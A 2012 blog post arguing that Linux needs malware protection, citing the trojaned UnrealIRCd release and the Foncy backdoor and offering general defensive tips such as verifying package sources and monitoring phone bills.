Friday, October 12, 2012

Why Linux Need Malware Protection?-How To Protect your Linux


Why Linux Need Malware Protection?

“This is very embarrassing.” So began a post by the developers of unreal IRCd server after finding that software was infected with a Trojan. Another example of why enterprises should consider the safe haven of Linux? Just the opposite : The Trojan infected only the Linux version of the server software, but its Windows counterpart was clean.

Although Linux malware is relatively rare compared to attacks on Windows, it exists, and it’s steadily increasing. In fact, as far back as 2005, the amount of known Linux malware had already doubled over the course of a year to 863 programs. As Linux’s popularity grows among consumers and enterprises, so does its attractiveness to hackers.

In the process, the strategy of security by obscurity becomes less viable. So far, Linux server appear to be targeted more frequently than Linux PC’s partly because there’s a larger installed base. The risks are not limited to servers and desktops, either. One recent example is Backdoor. Linux.Foncy.a “the most striking example of a malicious program used by cybercriminals to remotely control an infected device by sending a variety of commands.”

In a sense, Linux malware today is like mobile malware circa 2002 : Many businesses, consumers and analysts scoffed at warnings simply because attacks were so few and far between. But as the attacks mount, so does the need for  a strategy that’s more robust than simply betting that the odds are in your favor.

Developing a Security Strategy

The good news is that many successful strategies from the Windows world are applicable to Linux.

  • Think twice about downloading free software and content even when it, the source or both appear innocuous. Ignoring that advice has facilitated hacks such as screensavers that use Ubuntu PCs for distributed denial-of-service attacks.

Backdoor.Linux.Foncy.a passed itself off as the “Madden NFL 12” game.

  • Run a Windows antivirus program. BecauseLinux PCs are still a minority, there’s a good chance that a file is headed for a Windows machine. Windows antivirus software minimizes the chance that the Linux PC or server will facilitate malware’s spread.

  • Borrow from  Ronald Reagan : Trust, but verify. For example, many Linux users trust Ubuntu’s Personal Package Archives. The potential catch is that although there’s a code of conduct, there’s no guarantee that a secretly malicious signatory won’t leverage that trust. Verification could include using only entities that have proven themselves to be trustworthily, or inspecting the files in a package for anything suspicious before installation.

There’s also a growing selection of books and Web tutorials for developing an enterprise Linux security strategy. For ex, CuberCiti.biz advises : “Most Linux distort began enabling IPv6 protocol by default. Crackers can send bad traffic via IPv6 as most admins are not monitoring it. Unless network configuration requires it, disable IPv6 or configure Linux IPv6 firewall.”

  • Explore vendors offering Linux security services and products. There’s a good reason why they’re worth paying attention to :

They wouldn’t have those lines of business if there weren’t enough threats already out there.

  • Don’t let managers and other supervisors blindly sign off on the wireless portion of expanse reports. This advice is low-tech as it gets, but it’s also highly effective- not just for Android malware, but types that target all other mobiles OS’s, too. Although a lot of malware is designed to harvest credit card numbers and other personal information, Backboor.Linux.Foncy.a is an example of the types that send messages to premium-rate text message and other data services. By  simply questioning why an expanse report has an unusually high wireless bill that month, you could catch an infected smartphone before it has several months or more to incur unnecessary charges. In the case of Backdoor.Linux.Foncy.a, only about 2,000 Android phones were infected, but that was enough for the hackers- later arrested- to run up an estimated 100,000 Euros in unauthorized charges.

No comments:

Post a Comment